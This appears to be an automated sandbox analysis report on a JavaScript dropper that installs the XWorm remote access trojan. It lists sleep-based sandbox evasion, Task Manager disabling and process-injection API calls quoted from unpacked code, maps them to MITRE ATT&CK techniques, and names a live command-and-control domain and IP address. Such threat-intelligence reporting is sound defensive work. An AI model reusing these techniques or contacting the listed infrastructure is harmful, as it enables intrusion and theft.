Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Window / User API: threadDelayed 462			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Window / User API: threadDelayed 9010			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704	Thread sleep time: -339000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704	Thread sleep time: -9010000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5708	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6104	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4544	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4232	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3384	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3000	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477

Source: GeUT.exe, 00000003.00000002.3408146583.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: GeUT.exe.0.dr

Jump to dropped file

.NET source code references suspicious native API functions

Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to disable the Task Manager (.Net Source)

Source: GeUT.exe.0.dr, Program.cs	.Net Code: TaskMan
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs	.Net Code: TaskMan
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs	.Net Code: TaskMan
Source: Service.exe.2.dr, Program.cs	.Net Code: TaskMan

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	1 Native API	12 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	21 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
cc.js	39%	ReversingLabs	Script-JS.Trojan.Vjw0rm
cc.js	32%	Virustotal		Browse
cc.js	100%	Avira	JS/Dldr.G17

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\GeUT.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Service.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\GeUT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Service.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
as525795.duckdns.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
as525795.duckdns.org	2%	Virustotal		Browse
194.37.97.150	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
as525795.duckdns.org	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
as525795.duckdns.org	true	2%, Virustotal, Browse	unknown
194.37.97.150	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	GeUT.exe, 00000003.00000002.3410104953.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.mic	GeUT.exe, 00000008.00000002.2286549047.0000000000914000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523189
Start date and time:	2024-10-01 09:16:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
